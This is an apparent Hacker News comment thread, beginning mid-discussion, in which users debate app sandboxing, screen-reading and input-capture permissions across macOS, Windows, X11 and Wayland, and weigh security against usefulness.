
Having said that, plenty of useful apps can't ship in sandboxed form because of limitations in the current sandboxing model. And of course the fact that sandboxing is required for store distribution makes the store less useful. The implementation has much room for improvement, as do the store distribution policies.


Much work is being done on Wayland compositors and window managers to change this. Among other expected results are also the security aspects where the user is able to know which program is reading certain inputs and outputs, and might be able to control this data. As a basic example, a desktop app is only able to read/write the pixels inside the rectangle assigned by compositor, and it only receives keyboard events and mouse clicks that were sent inside this rectangle. I think this is an assumption one could make about a modern desktop. Sadly not enough users care about this type of security, so we stick to the old, X11 style of altruistic desktop computing where every program can see everything.


Couldn’t you just hook the wayland compositor to detect where focus is and eat up all those inputs?


I submit that the macOS interface leads to a reasonable expectation of greater security than an old-school executable running in the 90's or 00's, because macOS requires that the user explicitly grant permission to access so many other sensitive resources, such as location and contacts.

If an app has to ask me permission in order to access my keystrokes, I think it's fair to assume that the same would be true of apps that read (anything outside their window regions) from my screen. The fact that macOS doesn't require this is discoverable by sleuthing (browsing the Privacy pane, or remembering that screenshot apps don't ask for it), but there's reasonable, and probably common, mental models that don't make it obvious.

It would be like renting a house with four locks on the front door and none on the back. Yes, you could audit the house, but it's a weird asymmetry to have to look for.

(P.S. I'm older than you, FWIW :-)


Are you talking about High Sierra, or iOS devices? Because this just isn't true about my macbook pro running Sierra. There is no granular permissions model as in, for instance, Android 7. I give my (super) user password to install apps on my mac, and then after that, they run. There's no further permissions I can or can't grant, and there's no way to run install many desktop apps without my (super) user password.

Edit: It seems you a many of the others replying to the GP are talking about apps from the App Store, which I basically never use. And that's sort of the parent's point, I think. I get apps from the internet, install them, and use them, like and old-school desktop/PC computer user. I rarely need to use the app store (except for updates, and it's weird UX that OS updates are in the app store to begin with) and have no compelling reason to do so.


I'm talking about High Sierra, and apps loaded from App Store or non-store download links. For example, System Preferences > Security & Privacy > Privacy > Accessibility lists (among others) “Backup & Sync from Google”, BetterTouchTool, Dash, Dropbox, Google Chrome, Google Software Update, Keyboard Maestro, Little Snitch Agent. Many of these aren't even available from the app store. If I keep Accessibility unselected, some of these have degraded functionality. For example, I keep the Google apps and Dropbox unchecked, and then they can't annotate my Finder icons. (I'm okay with that.) I keep Dash unchecked, and keyboard snippets don't work.

You're right that this isn't super fine-grained. This single checkbox seems to govern several unrelated things, such as keystroke logging and insertion (Dash and Keyboard Maestro), mouse recording and control (Keyboard Maestro), and whatever APIs are used to badge Finder icons (Google and Dropbox). My belief is that an app that I haven't checked off there doesn't have access to my keystrokes. (Maybe this is wrong?) In which case I'm surprised there's nothing like this for recording the screen.


Even HTML5 web capturing works in a similar way. Once you give an site like Discord access to your microphone or screen it can pretty much access it whenever the page is open - granted it will show a little badge on screen by default.

A lot of users got tired of the on-screen badge being on all the time and probably set it to hidden (very easy to do) so not everyone is actually aware of when an HTML5 application is accessing a microphone/camera/screen.


A small aside: on the Mac, Micro Snitch [1] can let you know about any app that accesses the mic or webcam. It can use overlays, notifications, and/or just the systray to indicate that an app is using the mic/webcam. It also has an activity log that can you show past use.

[1] https://www.obdev.at/products/microsnitch/index.html


My thought exactly. I was like yes of course!

How does he think that desktop app can do many different things?

Now, sandbox is a different issue. But of course, yes it have access to the screen.

If apps on desktop is going to be as restrictive on mobile, why use desktop at all?


Are we ever going to end up with the practice of running every app in their own independent VM?

Should anything at all run in the host OS?

The advantage of running every app in their own VM means that apps won't get necessarily tossed to the side in this constant arms race of upgrades, especially for apps that don't need internet. Imagine still actively using several perfectly good apps that were last updated 10 or 20 years ago?


> Should anything at all run in the host OS?

Isn't that equivalent to saying that the set of available kernel calls should be more restricted?

(User mode is a kind of sandbox, after all)


It is my understanding that that's what Flatpak is trying to do: "One of Flatpak’s main goals is to increase the security of desktop systems by isolating applications from one another. [...] Limited syscalls. For instance, apps can’t use nonstandard network socket types or ptrace other processes. " [0]

But as my other comment mentions [1], I wish I had the knowledge required to understand the meaning / implications of Flatpak apps. Please let me know if I'm misunderstanding :)

Happy Saturday night y'all !

[0] http://docs.flatpak.org/en/latest/working-with-the-sandbox.h... [1] https://news.ycombinator.com/item?id=16351192


Not just the set of kernel calls but the scope of the calls themselves. A text editor should be able to fopen the file I’m editing but it doesn’t need to be able to access ~/Documents/top-secret.txt. You can do this type of thing with SELinux though I’ve yet to see it done in a user friendly way.


You’re looking for capability-based systems.


A lot of the motivations to develop and push for Wayland are around security and privacy. An X window, or just more generally any program running on a computer with an X session and either the same privilege or greater than the user running it can view anything on that screen, send any combination of inputs it wants or steal the pointer / keyboard indefinitely.

At the end of the day people don't care about security that much. Wayland is still getting there. Its getting better, particularly in the last year, but its not a huge priority for many people so it has taken upwards of ten years to become usable.


At the end of the day people don't care about security that much. Wayland is still getting there. Its getting better, particularly in the last year, but its not a huge priority for many people so it has taken upwards of ten years to become usable.

I think many people are also not aware of how bad X11 security is. The other day I mentioned that X11 applications can read all keystrokes to someone who does system administration/security at an ISP. To my big surprise, he was not aware of this. (Didn't everyone play with xev at some point?)

On Linux, I only use Wayland because of X11's broken security model. Fortunately, it works very well these days with the amdgpu driver.


However the way Wayland (or its broader ecosystem) "fixes" security is just stupid. Instead of using a fine grained whitelisting based permission system to grant different clients all the permissions they need to do their work (taking screenshots, reading the color of a point, listening to a certain key combination, apply some filtering to the display, get the size/position of a different client, ...) it treats every client as untrustworthy with no standard way to change that.

And let's not forget that just using Wayland doesn't grant any improved security compared to X11. There are numerous other ways to get input data, display contents, etc., so you need further sandboxing anyway, at which point you might just as well sandbox X11 clients you don't trust to get the same security. The benefit here is that you can decide if you trust your color picker and let it do its work by not sandboxing it, while Wayland just decides for you that no color picker can be trusted.


> However the way Wayland (or its broader ecosystem) "fixes" security is just stupid. Instead of using a fine grained whitelisting based permission system to grant different clients all the permissions they need to do their work

Because you can't do that in Unix. You can't ensure that the process with PID 1234 is really executing /usr/bin/foo.


Assuming other apps are sandboxed from /proc/1234, can't the shell just exec "/usr/bin/foo" and pass some file descriptors or secrets in environment variables?


How the wayland server and the shell are going to share (or agree to) that file descriptors or secrets in the first place? Or how can you ensure that the shell is not a rogue one?


> How the wayland server and the shell are going to share (or agree to) that file descriptors or secrets in the first place?

I read that GNOME just implements both in the same program (and calls it "shell").

> Or how can you ensure that the shell is not a rogue one?

I'm confused. Do you mean this kind of attack would become somewhat more probable or more dangerous if the original shell had some mechanism of allowing certain apps to pick colors?


The reason that Wayland (or X11) protocol uses Unix sockets for communications is because there is not a hierarchical relationship between a client process and the server process (they can be even from different user "sessions"). Also, a client can be launched from anywhere, including a "shell" such as a /bin/bash interactive session.


You can with SELinux, which is on all the major distros now, no?


I haven't heard about that, can you please provide a link?


A link to info about SELinux? It's a rather broad topic, you'll probably be better served to google for what ever aspect of it you're interested in but it's definitely in Redhat (even turned on by default [1]) and it's on Debian (not sure if it's on by default there).

[1] https://access.redhat.com/solutions/3176 <--- here they show how to turn it off because it's in enforcing mode by default.


About how to use SELinux to ensure that a process with certain PID is running the intended executable and that it hasn't been tampered by the user (i.e. a rogue app running with user perms).


Well, you'd need to read up on how SELinux works to understand that.

Briefly, SELinux adds some new permissions to files, new contexts to users and so on, so what happens is you specify what a given context is allowed to do, to a very granular level. For example, if you take postfix, it's split up into lots of programs, so you could say that the "init" context is allowed to run the postfix startup script but none of the rest of it. The postfix startup script will convert into some "postfix startup" context which is allowed to start the various programs but nothing else. So there will be a a postfix process that allows incoming IP addresses and can send on a specific FIFO and nothing else. There is another program which can read from the FIFO, change certain files and nothing else. So, imagine if you break into the program that talks with the internet: all you can do at that point is talk with the internet and talk with the FIFO. You can't read any files, write anything, execute anything, etc.

So that's kind of the idea of it. The above assumes an extremely tight SELinux configuration and no bugs in SELinux that would allow you to break out of your context. I've never seen a configuration as tight as described above but there did use to be a guy who had a Debian linux machine running on the internet where you could log in as root and try to break stuff. As far as I know, no one ever hacked that machine, starting out as root in a bash shell.


I fail to see how it can help in this case. The most fine-grained access you can achieve with SELinux are objects such as files or ports. What you need here is the ability to check if the other process has the permission to invoke certain operations from the current server through the Wayland protocol. It would be like arbitrary capabilities, but not linked to the operating system but to specific applications.

For example, in order for the Color Picker Tool to work, The Gimp should be marked with a "color picked allowed" capability, so when it asks the Wayland server for the color of pixels outside the surfaces it already owns, the server can check it and send the requested info. But a rogue program/process trying to scrap the screen content pixel by pixel shouldn't be able to do that. The inability to safely map processes to executables in Unix (and the possibility of manipulating their running code via exec(), library injection, ...) make it a very hard problem to solve without a paradigm shift that SELinux doesn't provide (as far as I can tell).


Oh I see. Yes, I don't think SELinux could do exactly the scenario you decide because the things you're mentioning don't exist at the OS level. If you can figure out a way to make them something SELinux can get a context onto then it would be possible.


Since I run all reasonably trusted open source software on my computer the sandboxing aspect of Wayland doesn't really help me. The one exception to this is the browser as those things now expose a vast attack surface. Unfortunately browsers are not sandboxed and they become significantly less functional if you somehow manage it. I don't care if my browser can't see the rest of the screen if it can see all my files and everything I do in other tabs on that browser.

So the benefits of the easier sandboxing provided by Wayland are somewhat overstated, at least for typical Linux users.


You can run the browser process in a separate mount namespace, only allowing it to access, for example, downloads folder, while everything else is off limits. I recommend Firejail.


Permmissions dialogs for rare dangerous behaviors I think can work. You have to do it like apple does it although, not like android.

Like how often does software need to do screenshots, not many. Same with most other app permissions. Most only need network access and a folder.


I'm afraid apps will abuse these permissions. For example, Facebook app (or a banking app) shouldn't quit if I refuse it a permission. I can't even use the default native email app (edit: on Android) with exchange without giving the exchange server remote administration access. Makes no sense.


That is why permission state needs to be hidden / discouraged from apps. No permission just gives you empty data sets. They should be also rejected from app store if they try to cirumvent unless it's a central feature of the app, like a screenshot app or a location tracking app.

With the permission model of apps, then we can start having system apps like istat menus being sold on the app store again too.

I think you haven't used iOS that much. In practice it's fairly rare for an app to shut down without a permission unless it's central to the app.


In fact, it's against the App Store guidelines to refuse to work without a permission (unless it's central to the app).


The Exchange server requesting remote permission is a "feature" which allows you or your company's Exchange server admins to send remote wipe command to the handset if it's lost or you leave the company. Not the specific fault of the permission model of the phone, it's part of the activesync suite.


You can use the default email application on Android with services that don't want remote-wipe controls. Exchange does. That's how ActiveSync works. If you don't want that, use IMAP or POP3.


How is the Android way different? We're two major and four minor versions since individual permission request were added.


Android AFAIK shows a large laundry list of permissions you need to accept when you install an app and you can revoke after the fact. While on iOS there is no laundry list to accept and the built in annoyance of permission alerts encourages apps not to do it unless they need it.

Also android takes a while to propagate new versions onto the majority install base :)


You just replied to a post stating that this changed years ago.


> Imagine still actively using several perfectly good apps that were last updated 10 or 20 years ago?

I regularly use Borland C++ 5 (because it has a nice enough customizable IDE and a very fast C compiler which is practically instant on modern PCs), which (IIRC) was released in 1996. And i also use a ton of other stuff from the 90s, including many games.

Things already work without the overhead and resource wastage of virtual machines, all it takes is OSes and libraries try to not break their ABIs.


We're there, check out Qubes OS


Great when it works, one of the few variants of Linux that sometimes just doesn't like to run on some hardware still.


> The advantage of running every app in their own VM means that apps won't get necessarily tossed to the side in this constant arms race of upgrades, especially for apps that don't need internet. Imagine still actively using several perfectly good apps that were last updated 10 or 20 years ago?

Not "especially for apps that don't need the Internet", only for apps that don't need the Internet. Anything that connects to the Internet needs constant and rigorous update discipline to stay ahead of a constant stream of exploits.

Sandboxing applications within their own VMs leads to a false sense of security. Now, whoever is responsible for distributing the app, is responsible for distributing the OS that runs the app as well. If the underlying OS doesn't get updated, Murphy guarantees that there will be an OS-level exploit within that VM. And then, even if the exploit is sandboxed to only affect that app and its OS, the attacker still owns anything that the user passes through that app, including but not limited to usernames and passwords (which are often reused across websites and apps), any sensitive information that passes through the app (banking and financial accounts, anybody?), and any privileges existing within the VM (session tokens, client keys, privileged access / firewall passthrough to other machines in the local network, etc.).

It's one thing to sandbox each app within its own userland-level sandbox, but sandboxing each app within its own VM / OS only makes security even more difficult. That kind of deployment model only makes sense if a sysadmin is doing so to make deployments more predictable and has the full power to reinitiate deployments when OS updates are released. On an end-user level, you're either risking the end-user's security (if upstream controls the OS update) or wasting the end-user's resources.


Imagine still actively using several perfectly good apps that were last updated 10 or 20 years ago?

I do. I don't know exactly what my oldest binary is, but it's probably from the 80s (some text processing utilities), and I still actively use apps I wrote myself over a decade ago. Of course, I use Windows which has historically been far better at backwards compatibility than Mac OS.


That's essentially what Docker containers have done to server-side applications. Every application is isolated from the host in a container and bundled with only the dependencies it needs. The only shared component is the kernel and anything you mount into it from the host.


I tried doing this when I got a new MacBook Pro. The problem is all these damn pixels make it impossible to even quarantine the web browser unless you're willing on letting VM Ware patch your macOS kernel (uh, no thanks).


Check out QubesOS.


I get that this is about the Mac apps, but doesn't this apply to any general OS? On Windows this is trivial, on any Linux distro using X11 too.


Just goes to show that not all sandboxes are created equal (though I don't think I've ever even used a properly sandboxed Windows or Linux app, so those OSes don't get any points anyway). For example, reading other tabs or processes out of the web browser sandbox isn't possible short of exploits like Spectre and Meltdown, and even seeing something like the history of visited links requires cleverly tricking the user (and coarse guesswork) e.g. https://tinsnail.neocities.org/ and http://lcamtuf.coredump.cx/yahh/ . I imagine the behavior in the OP is impossible on both Android and iOS too?


There was a pre-Spectre proof of concept of a program telling what tabs you have open in your web browser: https://github.com/defuse/flush-reload-attacks

This was a program rather than another webpage, and I haven't bothered to read how it worked beyond the general idea of exploiting a cache side-channel. I expect the bit-rate is low compared to Spectre/Meltdown. But it made me leery of confidentiality in current systems.


I think you have the idea of sandbox (or at least the idea of sandbox in the context of a web browser) backwards: it means an application (webpage) running inside the sandbox cannot access resources not granted. This side channel access does not run inside a sandbox at all.


If you don't consider an OS process a sandbox at all, why are even talking about security here?


That’s not the point of GP though? The whole premise of virtualization is that an OS process is not a perfect sandbox. There’s a hierarchy of sandboxes. Protecting other processes from accessing something inside the sandbox is not the job of a browser sandbox. This actually just goes to show the GP’s point: not all sandboxes are created equal.


I was not arguing against kibwen, I was sharing some more points. People have implicitly expected OS processes to be better isolated from each other than they are. (I think there's a related problem that people tend not to think about which of the properties of integrity, confidentiality, and availability they rely on.)


You might not be able to escape the browser's sandbox, but you can certainly escape your tab's sandbox and spy on other tabs using timing attacks: https://www.usenix.org/system/files/conference/usenixsecurit...


If you've used Chrome, you've used a properly sandboxed app on both. I believe Firefox also now uses the Chrome sandbox on Windows. And this is definitely not routine to accomplish on iOS or Android.


I think what's concerning is that advertising that an app is in a sandbox suggests to those out of the know that they can use it safely. They expect that the integrity and privacy of their information will be preserved. That expectation does not exist with ordinary win32 or Linux programs.

Are windows store apps sandboxed? If so, is it trivially easy to do this with those? Or is it just win32?


True UWP apps are sandboxed and probably can't do this. They have access to a limited version of the Win32 API, I believe.


X11 is way worse; any app can subscribe to events of any other app, making keyloggers and other nastyware a piece of cake.


This is a feature, not a bug, it is how you can compose an environment out of reusable components that are meant to do one thing by themselves. Tools like xbindkeys and xdotool work using this feature and the composability of X is how you can use the file manager from KDE with standalone window manager like i3 and a separate compositor (or no compositor). X is highly composable, even if many applications ignore that feature. If you know what you are doing you get a lot of power and flexibility with X, way more than any other window system (including Windows).


Proper/secure composability is designed not by exposing all internals, but by explicit APIs. For example, UNIX file descriptions and using them as stdin/stdout/stderr is a properly exposed API for reusable components, while the ability to plug into any function in the binary would not be.


X11, i.e. some of its implementations, don't expose all internals, and clients don't just plug into any function in the binary. The X11 protocol and some of its extensions clearly define how clients can communicate with each other or the server.

Wayland on the other hand does not. How and if clients can communicate with each other is considered out of the scope of the Wayland protocol, except a few exceptions (e.g. copy/paste) so it's up to the Wayland compositor. That's why there are already multiple different "APIs" to do screenshots on Wayland compositors, some more powerful some less, and not a single one is implemented by all major compositors - basically fragmentation hell. That's also why stuff like color pickers still don't work without tedious hacks (e.g. misusing some of the screenshot APIs).


It doesn't expose its internals, the equivalent to UNIX file descriptors in X is the XID (Window, Pixmap, etc). Much like you can give any process any file descriptor to work with, you can also give any process any XID to work with. And like you can combine the text output of processes by redirecting their stdio, you can combine the graphical output by combining their elements (it isn't exactly equivalent of course, partly due to increased complexity inherent in GUI applications but also due to little standardization and tools, but still several of elements in an X desktop - outside GNOME and KDE that implement their own functionality which ignore X - work like that).


> any app can subscribe to events of any other app

Yes, that's a feature I have used many times in the past. If you want to sandbox an app, run it through a nested X server.


Indeed.

And for Windows, more than once I wrote stuff that captures or injects keystrokes globally. Being able to do this is a feature that lets you solve problems by making things more interoperable.


AFAIK you can't get any hardware acceleration that way.


Depends on the X server, i think Xnest uses just a dumb framebuffer but i think Xephyr can use acceleration just fine.


Wow, i have a lot to learn.... Do you know if these sort of things are still possible on wayland ? What about a Flatpak app on Wayland, does that help ? Because I think I've read somewhere that Flatpak apps on X11 was this way, implying that with Wayland it wasn't. I wish i had more time to dive into this sort of stuff...

Flatpak does aggressively isolate apps from the OS though: http://docs.flatpak.org/en/latest/working-with-the-sandbox.h...


Wayland indeed closes a lot of these huge holes. It's one of the core reasons for its introduction.

Flatpak has no X11 sandbox. Others, like Firejail, have attempted to create X11 sandboxes, but they've had holes (last I tested they had the X RECORD extension enabled, which has no use except being a keylogger), or broke valid applications / accessibility tools.


No, Wayland doesn't close any of those huge holes. That's like saying: We removed all the windows to your house, you should now be safe from people spying on you or stealing your stuff.

Wayland doesn't grant Wayland clients permission to those resources, but without further sandboxing and using technologies like Linux namespaces, AppArmor, SELinux, ... that's completely useless in itself. Wayland only makes it harder/impossible for trustworthy applications to do their job, while malicious applications just take one of the many other routes to get what they want.


> Wayland doesn't grant Wayland clients permission to those resources, but without further sandboxing and using technologies like Linux namespaces, AppArmor, SELinux, ... that's completely useless in itself. Wayland only makes it harder/impossible for trustworthy applications to do their job, while malicious applications just take one of the many other routes to get what they want.

What you described is exactly the paper of Flatpak, I think it even used SELinux for it. AFAIK, Flatpak with Wayland is a good way to sandbox apps on Linux.


A good way to sandbox applications is where you get a secure system without much effort but you still can grant applications certain privileges, because as a matter of fact some applications just need access to sensitive data to do their work. With Wayland that's basically impossible, since there's no standardized way to grant your hotkey manager access to the global input, or your color picker permission to read the color of an arbitrary pixel on the screen, ... It's security by not doing anything.

With X11 on the other hand I can sandbox X11 clients I don't trust, thereby limiting them in what they can do, but other clients I do trust have the ability to do all sorts of great things so I can do my work efficiently. While not perfect, not even close, it's certainly better than not being allowed to do anything.


Windows 10 closed this hole.


How so? In java I can access all screens without requesting a permission.


Windows NT (way back to its original 3.1 release) always had the idea of multiple independent desktops where applications can't cross-interact. If you use runas to run GUI applications under different user contexts, you might notice that some things like drag-and-drop and the clipboard don't work, and also screen recorders won't work ... Most users never use this functionality normally, but you might notice sometimes if you do "Run As Administrator" and the applications don't quite integrate with non-admin apps.


Oh, so that's how this works. I've noticed this through occasionally broken copy-paste between normal and "elevated" apps. Never realized it's a separate feature, not just a forced sandboxing between regular and "elevated" apps. Thanks!


In store applications without full trust permissions you can not.


Store applications are not the only applications on Windows 10. Closing holes in store applications alone does not close all the holes.


This article is addressing sandboxed applications.

Regular applications, yes, you can pretty much do whatever in userspace in Win/Mac/X11. If you're going to create a new sandbox environment for applications (Windows Store/MacOS store) in today's world, it really needs to be locked down with explicit permissions for each type of I/O access.


On Linux, Wayland fixes this (+ allows for other security features, e.g. to protect the clipboard).


You can trivially sandbox X11 apps by running them in a nested X server.


And a separate user account, otherwise they can just connect to the original X server. (And on almost all existent Linux systems, either running as a separate user isn't trivial or the sandboxing process has root.)


Is a separate user account necessary if the Xauthority cookie is shadowed in the sandbox? I think firejail's nested X server setup works this way, without a separate user account.


What prevents you from reading the Xauthority cookie out of disk / an existing process's environment / out of an existing process's memory / etc.? You need a sandbox to prevent it fro doing these things, which is certainly doable, but much harder than just opening a new X server.

(On a system without Yama enabled, you can also ptrace any other process running as the same user and run code as it, e.g., using gdb, but lots of desktop-focused Linux distros enable Yama to close this particular approach.)


> What prevents you from reading the Xauthority cookie out of disk / an existing process's environment / out of an existing process's memory / etc.?

The sandbox does.

> You need a sandbox to prevent it fro doing these things, which is certainly doable, but much harder than just opening a new X server.

Of course. I never said simply running a new X server is sufficient. All I asked is if the sandbox needed to run the program in a separate user account.


How many apps do this?


If you trust an application so far as to properly limit itself in what it can do by requesting a sandboxed environment so you don't have to type a few additional letters you might just as well run it without a sandbox.

Hey kind stranger who is supposed to do the garden while I go shopping, I really don't trust you. So to be sure you only do the garden and nothing else, here are the keys to my house, please ensure that every door and window is locked. Thanks.

The only other entity who could set it up for you, so every application automatically launches in a sandboxed environment, is the distributor, but then again it's your responsibility to chose a distribution that does that.

If you want security you have to do something about it at one point or another.


I think this is the wrong attitude. No one is better suited to implement a sandbox than the developer of the application. The fact that most developers are not trained to do so is just a reflection of our field's terrible progress re: education devs on secure app dev.

Leaving this to the user leaves the vast majority of users unsafe. This is an unacceptable state.


Why should an application developer implement a sandbox? That's a huge waste of time and it's much more efficient if the operating system or the user enforces it instead by using existing sandboxing technologies like firejail. It is also untrustworthy and insecure, since after all you don't trust the application. If an application is responsible for sandboxing itself it can also choose not to sandbox itself properly if it wants to do harm.

There is no way around you either taking care of that yourself or you choosing an operating system that enforces it for you, like Qubes OS.


> Why should an application developer implement a sandbox?

Because they are the ones who understand the necessary capabilities of their program and the ones who have access to the source code...

> That's a huge waste of time and it's much more efficient if the operating system or the user enforces it instead by using existing sandboxing technologies like firejail.

Actually it's a far better sandbox when built into the program. And it doesn't leave users relying on installing arcane operating systems or becoming technically savvy.

> It is also untrustworthy and insecure, since after all you don't trust the application.

No, trusting the application is implicit since it's installed by the user. The sandbox exists to protect against a compromised application.


I, the user, do that. It's not the app's responsibility.


So apps need to ask for location but not to see everything you do? WTF


I imagine a world where every application that wanted to read and write to displays was required to go through an authorization-flow before it worked?

That sounds terrible. This behavior is how desktop applications are meant to work. I’m surprised this surprised anyone.


A desktop application has need to instruct the OS to draw its window. That can be reasonably unprivileged--an app owns its windows, this is easy. Most applications have no need to read raster data from its window. Even fewer have need to read raster data from the desktop itself.

Desktop applications are not "meant to" have access they don't need. They sometimes have that access as an accident of history, but they are not "meant to"; we've known about the principle of least privilege for a long time. And the MacOS sandbox (which, to be honest, doesn't work very well, but that's neither here nor there) is intended to enforce application privileges and reduce escalation.


Please humor me, why in the world does an app need to read/write your screen? It is provided a window for that.

If it doesn't need to read/write your screen in order to provide its features, and then does it, wouldn't you agree that something is fishy? Wouldn't you like to know when fishy things are going on?

What is the point of security if any app you download can see everything you do?


> Please humor me, why in the world does an app need to read/write your screen?

The most obvious answer would be to take screenshots, like GIMP's "Create from screenshot" command or a dedicated program like the snippet tool in Windows. Many graphics tools offer that functionality, even some that you can run from the command line.

Other, similarly widely available functionality, is to record the desktop - a common functionality needed for screencasting and video streaming (think Twitch) programs. This also need to capture audio. Also a more niche tool is to create captures directly to GIF files (i have such a tool both in Windows and Linux).

Of course less commonly implemented but still very useful functionality is for remote access/remote desktop (in which case you also need to also capture input events but also create fake input events indistinguishable from the user's events).

Finally several utilities also benefit from being able to read the screen, like utilities to magnify and perhaps enhance part of a screen (that can be useful for people with sight issues, or for developers to inspect the output of a graphics program at the pixel level without flattening their face on the monitor) or utilities like color pickers or even just funny toys that manipulate the screen contents (i've seen a game at the past grab a screenshot of your desktop and then zoom it out when you launch it).

> What is the point of security if any app you download can see everything you do?

I'd turn that around: what is the point of security if the apps you download cannot do their job because of it? At the end of the day computers need to be useful, not to be burned and buried in a waste disposal field (where they'd be in their most secure state).


> not to be burned and buried in a waste disposal field (where they'd be in their most secure state)

This is just a simple strawman.

It's not that hard to have a middle ground, just disallow apps from using things like your webcam or screen without your explicit permission. Just because 1 program uses that functionality doesn't necessitate it to be common to every single program you ever run.

iOS already manages this. Just have a notification pop up when you use the program to allow X access from system settings. Certain programs already do something similar by requesting access from Accessibility, like window managers (albeit that's to get around certain limitations).


If someone figures out a way for this sort of thing to be unintrusive while still being effective, i wouldn't mind it but i haven't seen anything like that. The notification popups you suggest are both intrusive and ineffective because, honestly, if i want to do some task anything that tries to alert me about something unrelated to that task ("hey, this needs net access" - sure, ok whatever... i cannot think about that right now, i need to actually do what i want to do) is something i am very unlikely to put any thought over so i'll just accept. I mean, i used to check the permissions on my Android mobile but after a year or so i stopped because at the end of the day the question is "do you want to run this program or not"? And considering i already downloaded the program to run it, the answer is obvious.

This stuff is really barely a notch above expecting people to read EULAs.


How often do you think most users read the screen, especially using something other than the screenshot tool of the operating system?

As an iOS developer I run Xscope to check details of designs, I don't know, maybe once every two weeks? And I guess I've probably used Acorn's color picker outside its own window during the last year, but I'm not sure about that.

I'd imagine that most users need apps reading arbitrary pixels off their screen less often than I do. I'd appreciate a warning from the operating system when an app tries to do that.


> How often

I do not think the frequency of needing that functionality is really relevant when you need to use it - you can either do it or you cannot.

But there are users who do need to use applications that capture the screen way more often than once every two weeks. One example would be Twitch and YouTube streamers (not necessarily about games - many stream other things, like creating art, programming, composing music, etc) who do that for several hours every day.

> do you think most users

There is no point talking about "most users" because really anything can be attributed to what "most users" do or do not - "most users" is not something that is well defined. We can only talk about specific use cases.

After all, all users (which by definition include most users) start as not being able to do anything, that doesn't mean the OS should not be able to do anything.

> As an iOS developer I run Xscope to check details of designs, I don't know, maybe once every two weeks? And I guess I've probably used Acorn's color picker outside its own window during the last year, but I'm not sure about that.

These are also useful examples for cases where you need screen reading, but these are really niche. The most common is probably streaming, as i mentioned above, but there are also other cases where you need frequent screen reading capabilities - for example documentation writers will often need to capture parts of the OS, either as screenshots or as short video segments (for interactive docs) to use as part of the documentation. It is also very helpful for customer support - in both sides of the equation (in a company i worked many years ago, the employee responsible for tech support had SnagIt open all the time).

> I'd appreciate a warning from the operating system when an app tries to do that.

I suspect that if that warning comes as part of your screenshot or video capture you wont appreciate it that much :-P


But this is not about removing the ability to read screen content. It's about removing the ability to read screen content without telling the user.

That's why I think questions about frequency and "most users" (nebulous term, I admit) come into play: yes/no permission dialogs aren't the best and many users do just click through them without thinking, but there's a world of difference between asking several times a day and asking a couple of times a month.

If my usage is far below average, then I agree that it's probably better not try to restrict it. If, as I would guess, I use it more than most, then it feels exceptional enough that letting the user know when it's happening would be fine.

If you could give a permanent permission to a given app, I'd imagine even the daily streamers wouldn't be too badly inconvenienced.


> I'd turn that around: what is the point of security if the apps you download cannot do their job because of it? At the end of the day computers need to be useful, not to be burned and buried in a waste disposal field (where they'd be in their most secure state).

I'd like to phrase it as "security vs. usefulness, pick one".

Unfortunately, I don't see a good way out of this. The more secure apps and the OS gets, the less useful it is - it loses composability and interoperability, any remnants of them being mediated by third parties (basically, see how SaaS apps talk to each other, and imagine this is your desktop now). But the more useful an app or OS is, the easier it is to make users selfpwn themselves through a stupid or compromised download.

I refuse to accept that I'm not allowed to do whatever I want with my own device, including running code that does whatever it wants with other applications, and especially things the authors of those other applications didn't anticipate or want me to do. But then, I can't see how a regular person could use the same computer without fear of their passwords or data getting stolen.

Are there any smart people working on this? Do they have any suggestions?


So if it needs it to implement its features, you would like to know about it. Otherwise you inevitably get spyware.


I'd like to know about it indeed, what i wouldn't like is to be spammed with annoying UAC-like questions every time an application needs to do something or even worse: not being able to do it.

And no, i wont get spyware, i never got spyware in the three decades i use software when desktop systems were at the apex of their popularity and i used the most popular of them - i doubt i'll get any sort of spyware today, especially when i'm not even using an OS that spyware authors would even bother with.


The very article of this post is an instance of spyware that any developer can implement. In effect, if you're using a Mac, any app can be spyware and you will never, ever know.


I didn't say that it is impossible to create spyware, i said that I wont get spyware. I am careful about what sort of software i download and i don't do it from shady places, at least not without first trying it in a controlled environment.

Note that i am not against such environments, quite the opposite, although i tend to prefer VMs like VirtualBox instead of OS sandboxes because - as the linked article shows - they are not as safe as VMs (yes i know that VMs can also be compromised but it is much harder and way more rare).

I believe that applications that run locally in my computer should be able to do whatever they please (if bugs wouldn't make it impractical, i'd also like it if they could read and write each other's memory), but a consequence to such a setup is that you need to be careful for what applications end up in the computer. So i am very thankful for any tool that does that - as long as it remains a tool and not impose itself without my will.


You, my friend, are vulnerable like any other Mac user, to a trustworthy piece of software that has but a single dependency implementing the screen-reading mentioned in the article. Don't think for a second that "being careful" will save you. Apps aren't open source. This is the point of this article.


Something being technically possible and something being done are not the same. As i already wrote, it might theoretically be possible to create a spyware, but unless i download a program that does that it wont happen.

Programs cannot decide by themselves to be installed into a computer without some prior action from the user, it is the user who has to do something for them to install themselves. And no two users do the exact same sequence of actions to be able to claim that all users have the same likelihood to be affected by spyware.

Also FWIW when i use "apps" i mean it as a shorthand for "applications" and for a few messages already upwards in the thread the discussion isn't just about macOS but regardless of OS. So apps can be open source (and personally unless it is some piece of software i trust - usually older widely used programs - or some game i got from a place i trust, i stick with open source apps with security being indeed a major reason).


Something malicious being easily technically possible with no risk and significant economic upside will statisically occur due to simple distribution of motives at large.

+1, only you can decide to install a program. However its total functional scope, "what it does", is never fully known, unless it is open source. "Doing research" about the developer will not solve the lack of transparency in the tool you're installing. It is the consumer OS's responsibility to make sure third parties don't get access to data consumers would deem sensitive, without proper authorization.


The Sandbox became the reason I left the mac app store and instead started selling my directly from my website using Paddle and I haven't looked back since.

It's been one of the most catastrophic decisions apple have ever made and IMO is hindering actual progress for desktop apps.


Felix Krause works for Google these days. Since he got hired he got a bit more critical to the platform. Perhaps no more “I hope this doesn’t piss off Apple” mentality?


The login dialog for the Itch.io desktop client is magically excluded from the accessible canvas on my OS X instance.


Knowing its dev, this doesn't surprise me:)


I was worry about a kind of this too. I was worry an app could steal my passwords from clipboard. I checked, at least a website can't just read from the clipboard. At least in theory .. I still fill the clipboard after the use to transfer a password (often) with random stuff ..


>I checked, at least a website can't just read from the clipboard. At least in theory

AFAIK the logic is that any user initiated event (click, keystroke, touch, etc) allows the page to see (and modify) clipboard contents for that instance. So if you accidentally click in a rogue page, it's possible for your clipboard contents to be stolen.


Most good password managers will do this for you automatically. When I copy a password out of 1Password, it doesn’t stay in the clipboard forever and there’s an option to specific the amount of time before clearing it.


